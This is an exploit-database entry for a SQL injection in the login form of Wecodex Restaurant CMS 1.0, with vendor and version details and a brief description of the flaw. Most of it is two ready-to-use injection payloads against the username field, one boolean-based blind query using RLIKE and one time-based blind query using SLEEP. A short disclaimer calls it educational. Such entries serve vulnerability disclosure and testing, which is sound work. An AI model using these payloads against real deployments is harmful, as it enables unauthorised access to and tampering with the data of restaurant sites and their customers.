Exploits / Vulnerability Discovered : 2018-05-23 |
Type : webapps |
Platform : php
This exploit / vulnerability Wecodex restaurant cms 1.0 login sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Wecodex Restaurant CMS 1.0 - 'Login' SQL Injection
# Dork: N/A
# Date: 2018-05-23
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor : Wecodex Solutions
# Vendor Homepage: https://www.wecodex.com/item/view/restaurant-system-in-php-and-mysql/6
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.
# Vulnerable Payload :
# Parameter: email (POST)
# Type: boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload:
username=admin" RLIKE (SELECT (CASE WHEN (7084=7084) THEN
0x61646d696e4061646d696e2e636f6d ELSE 0x28 END)) AND
"eloY"="eloY&password=123456
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
username=admin" AND (SELECT * FROM (SELECT(SLEEP(5)))lzxm) AND
"vZea"="vZea&password=123456